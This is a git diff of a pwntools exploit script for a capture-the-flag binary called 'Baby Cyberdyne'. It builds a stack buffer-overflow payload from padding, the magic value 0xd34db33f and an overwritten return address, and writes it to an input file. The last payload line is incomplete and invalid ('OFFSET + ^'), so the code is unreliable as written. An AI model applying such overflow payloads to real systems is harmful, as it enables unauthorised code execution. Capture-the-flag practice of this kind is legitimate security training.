updates

Unibw 2023/rev pwn/Baby Cyberdyne/ape.py

@@ -1,20 +1,24 @@
 from pwn import *
-elf = ELF(os.getcwd() + "/0d2dd2de6fc66a1b0e38dc299e38e0da")
+elf = ELF(os.getcwd() + "/baby")
 
 gs = '''
 unset env LINES
 unset env COLUMNS
 set follow-fork-mode child
-br *handle_conn+631
-# br *main+420
+# br *0x5663c4b8
+br gets
 continue
 '''
 
 def start():
     if args.GDB:
-        return gdb.debug([elf.path], gs)
+        return gdb.debug(elf.path, gs)
     else:
         return process([elf.path])
 
-io = start()
-io.sendline()
+# io = start()
+# input("waiting...")
+OFFSET = 0x56555000
+with open("input", "wb+") as f:
+    f.write(b'A'*42 + p32(1) + p32(0xd34db33f) + cyclic(cyclic_find('caaa')) + p32(OFFSET + ^))
+# io.interactive